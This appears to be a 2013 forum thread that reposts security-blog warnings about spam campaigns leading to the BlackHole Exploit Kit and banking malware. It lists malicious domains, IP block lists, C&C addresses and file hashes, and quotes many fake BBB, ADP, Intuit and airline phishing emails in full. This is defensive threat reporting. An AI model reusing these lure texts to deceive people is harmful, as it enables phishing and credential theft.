- http://blog.webroot.com/2013/01/02/spamvertised-your-recent-ebill-from-verizon-wireless-themed-emails-serve-client-side-exploits-and-malware/
Jan 2, 2013 - "... yet another Verizon Wireless themed malicious campaign, enticing users to click on the malicious link found in the email. Once users click on the link, they’re automatically exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_verizon_wireless_citi_ebill_exploits_malware_black_hole_exploit_kit.png
Sample email subjects: Fresh eBill is Should Be Complete. From: Verizon Wireless; Your Recent eBill from Verizon Wireless...
Malicious domain name reconnaissance:
proxfied .net – 59.57.247.185 – Email: colorsandforms @aol .com
Name Server: NS1.AMISHSHOPPE .NET – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET – Email: solaradvent @yahoo .com ..."
:mad:
AplusWebMaster
2013-01-07, 17:38
FYI...
Fake O2 Shop emails - Phish ...
- http://www.gfi.com/blog/fake-o2-shop-mails-dangle-phishy-bait/
Jan 7, 2013 - "... fake O2 Shop emails are in circulation at the moment, in the form of a “security update” asking for login credentials on the back of an “O2 account update” the recipient is supposed to have made. They’re pretty bare bones in terms of how they look, and you’ll notice that in the below example GMail flags it as spam so hopefully lots of other mail service providers will be doing the same thing.
> http://www.gfi.com/blog/wp-content/uploads/2013/01/fakeo2.jpg
Dear User,
You can now check the progress of your account at My O2. Just go to [url removed] and enter your username and password. If you’ve forgotten these, we can send you a reminder here too. Once you’ve signed in, go to My account and follow the instructions.
Regards,
O2 Customer Service
As with so many of these fire and forget spam campaigns, the bulk of them seem to lead to currently AWOL phish pages so they’re likely being taken offline at a fair old pace... treat random mails asking for login credentials with large portions of suspicion, especially when – as above – they’re referencing changes made to your account that you haven’t actually made."
:mad: :fear:
AplusWebMaster
2013-01-09, 01:21
FYI...
Malware sites to block 8/1/13
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-8113.html
8 Jan 2013 - "These IPs and domains appear to be active in malicious spam runs today:
41.168.5.140
42.121.116.38
62.76.186.24
82.165.193.26
91.224.135.20
110.164.58.250
187.85.160.106
210.71.250.131
belnialamsik .ru
Quite a few of these IPs have been used in multiple attacks, blocking them would be prudent.
Update: some sample emails pointing to a malicious landing page at [donotclick]belnialamsik .ru:8080/forum/links/column.php:
Date: Tue, 8 Jan 2013 10:05:55 +0100
From: Shavonda Duke via LinkedIn [member@linkedin.com]
Subject: Re: Fwd: Security update for banking accounts.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
===
Date: Tue, 8 Jan 2013 01:31:43 -0300 [01/07/13 23:31:43 EST]
From: FilesTube [filestube @filestubecom]
Subject: Fwd: Re: Banking security update.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
___
Fake "Federal ACH Announcement" SPAM / cookingcarlog .net
- http://blog.dynamoo.com/2013/01/federal-ach-announcement-spam.html
8 Jan 2013 - This rather terse spam leads to malware on cookingcarlog .net:
From: Federal Reserve Services @ sys.frb .org [ACHR_59273219 @fedmail .frb .org]
Date: 8 January 2013 15:11
Subject: FedMail (R): Federal ACH Announcement - End of Day - 12/27/12
Please find the ACH Letter of Advice Reporting from the Federal Reserve System clicking here.
The link in the email goes to an exploit kit on [donotclick]cookingcarlog .net/detects/occasional-average-fairly.php (report here*) which is hosted on 89.207.132.144 (Snel Internet Services, Netherlands).
* http://wepawet.iseclab.org/view.php?hash=113ca923e70652baad7b97e758bde34b&t=1357658280&type=js
Added - a BBB spam is also doing the rounds with the same payload:
Better Business Bureau ©
Start With Trust �
Mon, 7 Jan 2013
RE: Case N. 54809787
[redacted]
The Better Business Bureau has been recorded the above said claim from one of your customers in respect to their dealings with you. The detailed description of the consumer's worry are available for review at a link below. Please pay attention to this issue and communicate with us about your judgment as soon as possible.
We pleasantly ask you to click and review the CLAIM REPORT to meet on this claim letter.
We are looking forward to your prompt response.
WBR
Mason Turner
Dispute Consultant
Better Business Bureau
Better Business Bureau
3063 Wilson Blvd, Suite 600 Arlington, VA 22701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
___
Fake BBB SPAM / royalwinnipegballet .net
- http://blog.dynamoo.com/2013/01/bbb-spam-royalwinnipegballetnet.html
8 Jan 2013 - "This fake BBB spam leads to malware on royalwinnipegballet .net:
Date: Tue, 8 Jan 2013 19:18:34 +0200 [12:18:34 EST]
From: Better Business Bureau <information @bbb .org>
To: [redacted]Subject: BBB information regarding your customer's appeal ¹ 96682901
Better Business Bureau ©
Start With Trust ©
Mon, 7 Jan 2013
RE: Complaint # 96682901
[redacted]
The Better Business Bureau has been registered the above mentioned appeal from one of your clients as regards their business contacts with you. The details of the consumer's worry are available for review at a link below. Please give attention to this matter and notify us about your sight as soon as possible.
We graciously ask you to open the CLAIM REPORT to answer on this reclamation.
We are looking forward to your prompt answer.
Faithfully yours
Alex Green
Dispute Counselor
Better Business Bureau
3063 Wilson Blvd, Suite 600 Arlington, VA 27201
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was delivered to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
===
Date: Tue, 8 Jan 2013 19:12:58 +0200 [12:12:58 EST]
From: Better Business Bureau <donotreply @bbb .org>
Subject: Better Business Beareau Pretense ¹ C6273504
Priority: High Priority 1
Better Business Bureau ©
Start With Trust ©
Mon, 7 Jan 2013
RE: Issue No. C6273504
[redacted]
The Better Business Bureau has been registered the above said reclamation from one of your users in respect of their business contacts with you. The information about the consumer's anxiety are available visiting a link below. Please give attention to this problem and notify us about your mind as soon as possible.
We kindly ask you to overview the APPEAL REPORT to meet on this claim letter.
We are looking forward to your prompt rebound.
Yours respectfully
Julian Morales
Dispute Advisor
Better Business Bureau
3013 Wilson Blvd, Suite 600 Arlington, VA 20701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is on [donotclick]royalwinnipegballet .net/detects/occasional-average-fairly.php hosted on 89.207.132.144 (Snel Internet, Netherlands) which was hosting another attack site this morning (so best blocked in my opinion)
:mad::mad::mad:
AplusWebMaster
2013-01-09, 15:19
FYI...
Fake AICPA emails serve client-side exploits and malware
- http://blog.webroot.com/2013/01/09/spamvertised-aicpa-themed-emails-serve-client-side-exploits-and-malware/
Jan 9, 2013 - "... recently spamvertised campaigns impersonating the American Institute of Certified Public Accountants, also known as AICPA...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/aicpa_email_spam_exploits_malware_black_hole_exploit_kit.png
Second screenshot of the spamvertised email from the same campaign:
> https://webrootblog.files.wordpress.com/2013/01/aicpa_email_spam_exploits_malware_black_hole_exploit_kit_01.png
Sample subjects: Tax return assistance contrivance; Suspension of your CPA license; Revocation of your CPA license; Your accountant license can be end off; Your accountant CPA License Expiration...
Upon successful client-side exploitation, the campaign drops MD5: 5b7aafd9ab99aa2ec0e879a24610844a * ... Worm:Win32/Cridex.E.
Once executed, the sample performs the following actions:
Creates a batch script
Accesses Firefox’s Password Manager local database
Creates a thread in a remote process
Installs a program to run automatically at logon
It also drops the following MD5 on the affected hosts: MD5: 3e2df81077283e5c9d457bf688779773 ** ... PWS:Win32/Fareit.
It also phones back to the following C&C servers:
hxxp:// 69.64.89.82 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
132.248.49.112
173.192.229.36
64.120.193.112
89.221.242.217
174.143.174.136
209.51.221.247
We’ve also seen and profiled the same IP (132.248.49.112) in multiple previously analyzed malware campaigns..."
* https://www.virustotal.com/file/5f99e67f2208171e4a43039555456f12e7ae3c0b8974e88e4bc59800c68e2e12/analysis/
File name: contacts.exe
Detection ratio: 31/45
Analysis date: 2012-12-18
** https://www.virustotal.com/file/292554dd80874a86f085f4432327fdc08022f7774537b7ef72e424541e09d67d/analysis/
File name: exp3C6.tmp.exe
Detection ratio: 27/45
Analysis date: 2013-01-04
___
New Year, New Old Threats
- http://www.gfi.com/blog/new-year-new-old-threats/
Jan 9, 2013 - "... we have found an old Facebook scam, which dates back from two years ago, making rounds again and a spam-phishing ploy that is so 2007...
(Screenshots available at the gfi URL above.)
Previous versions of this scam usually asks visitors to click “Like” buttons for pages, a method usually employed for the purpose of increasing the popularity of pages and their monetary value once sold. For the scam to proliferate within the network, users are also asked to update their Facebook profile with the above status message and link. Some versions present either a list of surveys to fill in or a form where users can enter their mobile numbers; only this latest scam offers both... Our researchers in the AV Labs found an in-the-wild email spam leading to a phishing attack. It targets users of the open-source webmail application, SquirrelMail... The email is exactly as it was back in 2007, so any user can take their cues from the outdated versions of the app mentioned and the supposed solution to the issue the email is attempting to address... advice? Delete the spam at once."
___
Something evil on 173.246.102.246
- http://blog.dynamoo.com/2013/01/something-evil-on-173246102246.html
9 Jan 2013 - "173.246.102.246 (Gandi, US) looks like it is being used for exploit kits being promoted either through malvertising or through exploited OpenX ad servers. In the example I have seen, the malicious payload is at [donotclick]11.lamarianella .info/read/defined_regulations-frequently.php (report here*). These other domains appear to be on the same server, all of which can be assumed to be malicious:
11.livinghistorytheatre .ca
11.awarenesscreateschange .com
11.livinghistorytheatre .com
11.b2cviaggi .com
11.13dayz .com
11.lamarianella .info
11.studiocitynorth .tv
11.scntv .tv
These all appear to be legitimate but hijacked domains, you may want to block the whole domain rather than just the 11. subdomain."
* http://wepawet.iseclab.org/view.php?hash=1e0711361dfe5801ffc4ce7b14e4a3f1&type=js
> https://www.google.com/safebrowsing/diagnostic?site=AS:29169
"... in the past 90 days. We found 67 site(s)... that infected 262 other site(s)..."
___
Fake ADP SPAM / demoralization .ru
- http://blog.dynamoo.com/2013/01/adp-spam-demoralizationru.html
9 Jan 2013 - "This fake ADP spam leads to malware on demoralization .ru:
Date: Wed, 9 Jan 2013 04:23:03 -0600
From: Habbo Hotel [auto-contact @habbo .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 948284271
Wed, 9 Jan 2013 04:23:03 -0600
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www .flexdirect .adp.com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 703814359
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
� 2013 ADP, Inc. All rights reserved.
The malicious payload is at [donotclick]demoralization .ru:8080/forum/links/column.php hosted on the following IPs:
82.165.193.26 (1&1, Germany)
91.224.135.20 (Proservis UAB, Lithunia)
187.85.160.106 (Ksys Soluções Web, Brazil)
The following IPs and domains are all related:
82.165.193.26
91.224.135.20
187.85.160.106
demoralization .ru
belnialamsik .ru
bananamamor .ru ..."
___
Fake BBB SPAM / hotelrosaire .net
- http://blog.dynamoo.com/2013/01/bbb-spam-hotelrosairenet.html
9 Jan 2013 - "This fake BBB spam leads to malware on hotelrosaire .net:
Date: Wed, 9 Jan 2013 09:21:32 -0600 [10:21:32 EST]
From: Better Business Bureau <complaint @bbb .org>
Subject: BBB notification regarding your cliente's pretense No. 62850348
Better Business Bureau ©
Start With Trust �
Tue, 8 Jan 2013
RE: Complaint N. 62850348
[redacted]
The Better Business Bureau has been booked the above said complaint from one of your users in regard to their business contacts with you. The detailed description of the consumer's anxiety are available for review at a link below. Please give attention to this problem and inform us about your sight as soon as possible.
We pleasantly ask you to click and review the APPEAL REPORT to respond on this claim letter.
We awaits to your prompt reaction.
Yours respectfully
Liam Barnes
Dispute Consultant
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 25501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
========
Date: Wed, 9 Jan 2013 23:21:42 +0800 [10:21:42 EST]
From: Better Business Bureau <donotreply @bbb .org>
Subject: BBB Complaint No. C1343110
Better Business Bureau ©
Start With Trust ©
Tue, 8 Jan 2013
RE: Case No. C1343110
[redacted]
The Better Business Bureau has been booked the above mentioned complaint from one of your clients as regards their business relations with you. The information about the consumer's anxiety are available for review at a link below. Please pay attention to this question and inform us about your glance as soon as possible.
We pleasantly ask you to overview the COMPLAINT REPORT to reply on this grievance.
We are looking forward to your prompt reaction.
Yours respectfully
Hunter Gomez
Dispute Counselor
Better Business Bureau
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 22801
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is on [donotclick]hotelrosaire .net/detects/keyboard_ones-piece-ring.php hosted on 64.120.177.139 (HostNOC, US) which also hosts royalwinnipegballet .net which was seen in another BBB spam run yesterday."
>> https://www.google.com/safebrowsing/diagnostic?site=AS:21788
"... in the past 90 days. We found 543 site(s).. that infected 5049 other site(s)..."
:mad::mad:
AplusWebMaster
2013-01-10, 15:25
FYI...
Fake U.S Airways emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/10/please-confirm-your-u-s-airways-online-registration-themed-emails-lead-to-black-hole-exploit-kit/
Jan 10, 2013 - "... On numerous occasions, we intercepted related campaigns attempting to trick customers into clicking on malicious links, which ultimately exposed them to the client-side exploits served by the latest version of the BlackHole Exploit Kit. Apparently, the click-through rates for these campaigns were good enough for cybercriminals to resume spamvertising related campaigns. In this post, I’ll profile the most recently spamvertised campaign impersonating U.S Airways...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/us_airways_email_spam_exploits_malware_black_hole_expoit_kit.png
... Malicious domain name reconnaissance:
attachedsignup .pro – 41.215.225.202 – Email: kee_mckibben0869 @macfreak .com
... Upon successful client-side exploitation, the campaign drops MD5: 6f51e309530f8900be935716c3015f58 * ... Worm:Win32/Cridex.E
The executable creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
As well as the following mutexes:
Local\XMM000003F8
Local\XMI000003F8
Local\XMRFB119394
Local\XMM000005E4
Local\XMI000005E4
Local\XMM0000009C
Local\XMI0000009C
Local\XMM000000C8
Local\XMI000000C8
Once executed, the sample phones back to the following C&C servers:
180.235.150.72 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
174.143.174.136 :8080/AJtw/UCyqrDAA/Ud+asDAA/
We’ve already seen the same pseudo-random C&C phone back characters used... previously profiled malicious campaigns..."
* https://www.virustotal.com/file/d11fb7812df059253955beebe9a33df807a76d0bcca1ec212faa802de2cbd1fe/analysis/
File name: 6f51e309530f8900be935716c3015f58
Detection ratio: 24/46
Analysis date: 2012-12-07
___
Fake ADP SPAM / tetraboro .net and advertizing* .com
- http://blog.dynamoo.com/2013/01/adp-spam-tetraboronet-and-advertizingcom.html
10 Jan 2013 - "This fake ADP spam leads to malware on tetraboro .net. It contains some errors, one of which is the subject line just says "adp_subj" rather than having been filled out properly...
Date: Thu, 10 Jan 2013 17:48:09 +0200 [10:48:09 EST]
From: "ADPClientServices @adp .com" [ADPClientServices @adp .com]
Subject: adp_subj
ADP Urgent Note
Note No.: 33469
Respected ADP Consumer January, 9 2013
Your Processed Payroll Record(s) have been uploaded to the web site:
Click here to Sign In
Please take a look at the following details:
• Please note that your bank account will be debited within one banking day for the amount(s) specified on the Protocol(s).
Please don't reply to this message. auomatic informational system not configured to accept incoming mail. Please Contact your ADP Benefits Specialist.
This notification was sent to current clients in your company that approach ADP Netsecure.
As general, thank you for choosing ADP as your business butty!
Ref: 33469
The malicious payload is on [donotclick]tetraboro .net/detects/coming_lost-source.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). A quick look indicates a number of related malicious domains and IPs, including advertizing1 .com through to advertizing9 .com. All of these should be blocked.
5.135.90.19 (OVH, France - suballocated to premiervps.net, UK)
91.227.220.121 (VooServers, UK)
94.102.55.23 (Ecatel, Netherlands)
119.78.243.16 (China Science & Technology Network, China)
198.144.191.50 (New Wave Netconnect, US)
199.233.233.232 (Quickpacket, US)
203.1.6.211 (China Telecom, China)
222.238.109.66 (Hanaro Telecom, Korea)
Plain list:
advertizing1 .com
advertizing2 .com
advertizing3 .com
advertizing4 .com
advertizing5 .com
advertizing6 .com
advertizing7 .com
advertizing8 .com
advertizing9 .com
cookingcarlog .ne
hotelrosaire .net
richbergs .com
royalwinnipegballet .net
tetraboro .net
5.135.90.19
91.227.220.121
94.102.55.23
119.78.243.16
198.144.191.50
199.233.233.232
203.1.6.211
222.238.109.66 ..."
:mad:
AplusWebMaster
2013-01-11, 16:10
FYI...
Fake Chrome updates return ...
- http://www.gfi.com/blog/fake-google-chrome-updates-return/
Jan 11, 2013 - "... fake Chrome update websites leading to Malware – has returned...
> http://www.gfi.com/blog/wp-content/uploads/2013/01/googchromefake1.jpg
The design of the website is identical to the initial rollout, urging the end-user to “Update Google Chrome: To make sure that you’re protected by the latest security updates”. If you attempt to download the file while using Chrome, the following prompt appears...
> http://www.gfi.com/blog/wp-content/uploads/2013/01/googchromefake2.jpg
The file itself has been around for a while, being seen on around 14 or so websites since around October and is listed at Malwr.com which mentions attempts to access Firefox’s Password Manager local database – meanwhile, it’s listed on the comments section of VirusTotal* as being capable of stealing banking credentials. You’ll notice they mention Zeus – indeed, one of the DNS requests made is to a site by the Malware is related to ZBot / Blackhole exploit kit attacks. In fact, it seems to want to swipe information of a very similar nature to a ZBot infection from August of 2012 detailed on the ShadowServer Blog** (scroll down to the “data it tries to collect and steal”)... users of Chrome curious about updates should simply read the information on the relevant Google Chrome support page***".
* https://www.virustotal.com/file/19d087ddaadf8fc3d5b8a422dc303e6ea6cdac2a55b4b14e9f28aec9c8902439/analysis/
** http://blog.shadowserver.org/2012/08/14/beware-the-trolls-secure-your-trackers/
*** https://support.google.com/chrome/bin/answer.py?hl=en&answer=95414
___
Fake Changelog SPAM / dimanakasono .ru
- http://blog.dynamoo.com/2013/01/changelog-spam-dimanakasonoru.html
11 Jan 2013 - "This fake "Changelog" spam leads to malware on dimanakasono .ru:
From: Ashley Madison [mailto:donotreply @ashleymadison .com]
Sent: 10 January 2013 08:25
Subject: Re: Fwd: Changelog as promised(updated)
Hi,
changelog update - View
L. Cook
The malicious payload is at [donotclick]dimanakasono .ru:8080/forum/links/column.php hosted on the following IPs:
91.224.135.20 (Proservis UAB, Lithunia)
187.85.160.106 (Ksys Soluções Web, Brazil)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are related and should be blocked:
91.224.135.20
187.85.160.106
212.112.207.15
belnialamsik .ru
demoralization .ru
dimanakasono .ru
bananamamor .ru
___
Fake Intuit SPAM / dmeiweilik .ru
- http://blog.dynamoo.com/2013/01/payroll-account-holded-by-intuit-spam.html
11 Jan 2013 - "This fake Intuit (or LinkedIn?) spam leads to malware on dmeiweilik .ru:
Date: Fri, 11 Jan 2013 06:23:41 +0100
From: LinkedIn Password [password @linkedin .com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Fri, 11 Jan 2013 06:23:41 +0100.
Finances would be gone away from below account# ending in 0198 on Fri, 11 Jan 2013 06:23:41+0100
amount to be seceded: 8057 USD
Paychecks would be procrastinated to your personnel accounts on: Fri, 11 Jan 2013 06:23:41 +0100
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
=====
From: messages-noreply @bounce .linkedin.com [mailto:messages-noreply @bounce .linkedin.com] On Behalf Of Lilianna Grimes via LinkedIn
Sent: 10 January 2013 21:04
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Fri, 11 Jan 2013 02:03:33 +0500.
• Finances would be gone away from below account # ending in 8913 on Fri, 11 Jan 2013 02:03:33 +0500
• amount to be seceded: 9567 USD
• Paychecks would be procrastinated to your personnel accounts on: Fri, 11 Jan 2013 02:03:33 +0500
• Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]dmeiweilik .ru:8080/forum/links/column.php hosted on the same IPs as in this attack*:
91.224.135.20 (Proservis UAB, Lithunia)
187.85.160.106 (Ksys Soluções Web, Brazil)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are related and should be blocked:
91.224.135.20
187.85.160.106
212.112.207.15
belnialamsik .ru
demoralization .ru
dimanakasono .ru
bananamamor .ru
dmeiweilik .ru ..."
* http://blog.dynamoo.com/2013/01/changelog-spam-dimanakasonoru.html
___
Blackhole SPAM runs...
- http://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-spam-runs-return-from-holiday-break/
Jan 11, 2013 - "... now that the holidays are over, cybercriminals behind BHEK campaigns are back again, this time spoofing companies like HP, Federal Reserve Bank*, and Better Business Bureau**. In particular, the Better Business Bureau BHEK spam** claims to be a complaint report and urges its recipients to click a link pointing to the said claim letter report. The links eventually lead to sites that host the Blackhole Exploit Kit... we are expecting that cybercriminals will prefer creating more toolkits rather than making new malware..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/01/ACH_bhekspam.jpg
** http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/01/BBB_BHEKspam.jpg
:mad:
AplusWebMaster
2013-01-14, 14:22
FYI...
Malware sites to block 14/1/13
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-14113.html
14 Jan 2013 - "A couple of interesting* posts** over at Malware Must Die!*
* http://malwaremustdie.blogspot.co.uk/2013/01/once-upon-time-with-cool-exploit-kit.html
** http://malwaremustdie.blogspot.co.uk/2013/01/decoding-guide-double-obfuscation.html
... showed some significant nastiness on a few IP ranges you might want to block. The IPs mentioned are:
1.243.115.140 (Aztek Ltd, Russia)
46.166.169.238 (Santrex, Netherlands)
62.76.184.93 (IT House / Clodo-Cloud, Russia)
I'll list the sites on these domains at the end of the post for readability. But in these cases, blocking just the single IPs is not enough as they reside in pretty evil netblocks which should be blocked altogether.
91.243.115.0/24 (Aztek Ltd) is part of this large collection of malware hosts. Perhaps not all sites in the network are malicious, but certainly a lot of them are. I would err on the side of caution and block access to all sites in this /24, legitimate or not.
46.166.169.0/24 (Santrex) is another horrible network. According to Google, out of 4604 tested sites in this block, at least 3201 (70%) are involved in malware distribution. There may be legitimate sites in this /24, but since customer service is allegedly atrocious then it's hard to see why they would stick around. Again, blocking this /24 is probably prudent.
62.76.184.0/21 (IT House / Clodo-Cloud) is quite a large range to block, but I have seen many malicious sites in this range, and like Aztek it is part of this large network of malware hosts and it has a poor reputation. This is only a part of this netblock, if you want to go further you could consider blocking 62.76.160.0/19.
These following domains are all connected to these two attacks..."
(Also a long list available at the dynamoo uRL above.)
___
Fake ADP emails lead to client-side exploits and malware
- http://blog.webroot.com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malware/
14 Jan 2013 - "... cybercriminals have resumed spamvertising fake “ADP Immediate Notifications” in an attempt to trick users into clicking on the malicious links found in the emails. The links point to the latest version of the Black Hole Exploit Kit, and consequently, exploit CVE-2013-0422...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_adp_speedy_notification_fake_malware_exploits_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
tetraboro .net – 222.238.109.66 – Email: bannerpick45 @yahoo .com
Name Server: NS1.HOSTCLAM .NET – 50.115.163.10
Name Server: NS2.HOSTCLAM .NET – 90.167.194.23
Responding to 222.238.109.66 are also the following malicious campaigns part of the campaign:
royalwinnipegballet .net
advertizing9 .com
eartworld .net
hotelrosaire .net
Upon successful client-side exploitation, the campaign drops MD5: 5a859e1eff1ee1576b61da658542380d * ... Worm:Win32/Cridex.E.
The sample drops the following MD5 on the affected hosts:
MD5: 472d6e748b9f5b02700c55cfa3f7be1f ** ...PWS:Win32/Fareit
Once executed, it also phones back to the following command and control servers:
173.201.177.77
132.248.49.112
95.142.167.193
81.93.250.157 ..."
* https://www.virustotal.com/file/69d9152b45fe6e9da8df13f28d2fc1f34bcc6974f9946d569dfc8f761f883b3b/analysis/
File name: test29567554014546.bin
Detection ratio: 24/46
Analysis date: 2013-01-14
** https://www.virustotal.com/file/baab82eb7c03dcfd7da9a6f0d410f7b948c3d742910217904e67cd71eb36e596/analysis/
File name: file-5000060_exe
Detection ratio: 15/46
Analysis date: 2013-01-11
___
Fake ADP SPAM / dekamerionka .ru
- http://blog.dynamoo.com/2013/01/adp-spam-dekamerionkaru.html
14 Jan 2013 - "This fake ADP spam leads to malware on dekamerionka .ru:
Date: Mon, 14 Jan 2013 10:49:06 +0300
From: Friendster Games [friendstergames @friendster .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 540328394
Mon, 14 Jan 2013 10:49:06 +0300
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 984259785
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is on [donotclick]dekamerionka.ru:8080/forum/links/column.php hosted on:
81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)
91.224.135.20 (Proservis UAB, Luthunia)
212.112.207.15 (ip4 GmbH, Germany)
Plain list of IPs and domains involved:
81.31.47.124
91.224.135.20
212.112.207.15
dmeiweilik .ru
belnialamsik .ru
demoralization .ru
dumarianoko .ru
dimanakasono .ru
bananamamor .ru
dekamerionka .ru
___
Fake BBB SPAM / terkamerenbos .net
- http://blog.dynamoo.com/2013/01/bbb-spam-terkamerenbosnet.html
14 Jan 2013 - "This fake BBB spam leads to malware on terkamerenbos .net:
Date: Mon, 14 Jan 2013 07:53:04 -0800 [10:53:04 EST]
From: Better Business Bureau [notify @bbb .org]
Subject: BBB Pretense ID 68C474U93
Better Business Bureau ©
Start With Trust ©
Mon, 14 Jan 2013
RE: Issue # 68C474U93
[redacted]
The Better Business Bureau has been booked the above said claim from one of your customers with regard to their business relations with you. The detailed description of the consumer's uneasiness are available at the link below. Please give attention to this subject and notify us about your mind as soon as possible.
We amiably ask you to click and review the CLAIM REPORT to meet on this complaint.
We are looking forward to your prompt reaction.
Best regards
Alexis Nguyen
Dispute Councilor
Better Business Bureau
Better Business Bureau
3033 Wilson Blvd, Suite 600 Arlington, VA 22701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was delivered to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is at [donotclick]terkamerenbos .net/detects/pull_instruction_assistant.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). The following malicious sites are on the same server:
advertizing9 .com
alphabeticalwin .com
splatwetts .com
bestwesttest .com
eartworld .net
foxpoolfrance .net
hotelrosaire .net
linuxreal .net
tetraboro .net
royalwinnipegballet .net
:mad::mad:
AplusWebMaster
2013-01-15, 15:53
FYI...
Fake Southwest Airlines Giveaway...
- http://www.gfi.com/blog/fake-southwest-airlines-giveaway-flies-high-once-more/
Jan 15, 2013 - "A fresh campaign fake Southwest Airlines free ticket scam has made its way onto Facebook again, this time as an event invite spammed within the network.
Southwest Airlines is giving two tickets to any destination within the United States! To grab yours, just visit [URL here]
Based on the bit.ly data of the URL, it is highly likely that this scam has been going around since the 14th of this month. Once users click the shortened URL, they are redirected to a page where, purportedly, they can claim their free two tickets to the US. The page claims that the offer is only available for a certain period, suggesting that interested parties must act now or else miss this opportunity... Users are advised to ignore this Facebook event invite if you receive them and notify the creator of the invite that their post must be deleted."
(Screenshots available at the gfi URL above.)
___
xree .ru and the persistent pharma SPAM
- http://blog.dynamoo.com/2013/01/xreeru-and-persistent-pharma-spam.html
15 Jan 2013 - "No doubt sent out by the same crew who are pushing malware, this pharma spam seems to have hit new highs.
Date: Tue, 15 Jan 2013 05:35:04 -0500 (EST)
From: Account Mail Sender [invoice @erlas .hu]
Subject: Invoice confirmation
Hello. Thank you for your order.
We greatly appreciate your time and look forward to a mutually rewarding business relationship with our company well into the future.
At present, our records indicate that we have an order or several orders outstanding that we have not received confirmation from you. If you have any questions regarding your account, please contact us.
We will be happy to answer any questions that you may have.
Your Customer Login Page
Customer login: [redacted]
Thanking you in advance for your attention to this matter.
Sincerely, Justa Dayton
The link in the email goes through a legitimate hacked site to [donotclick]xree .ru/?contactus but then it redirects to a seemingly random fake pharma site. However, the redirect only works if you have the referrer set correctly.
The landing sites are on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
I can't find any malware on these sites, but you may as well block them if you can as they seem to have a lot of domains on them..."
(Long list of domains available at the dynamoo URL above.)
__
Verizon Wireless SPAM / dmssmgf .ru
- http://blog.dynamoo.com/2013/01/verizon-wireless-spam-dmssmgfru.html
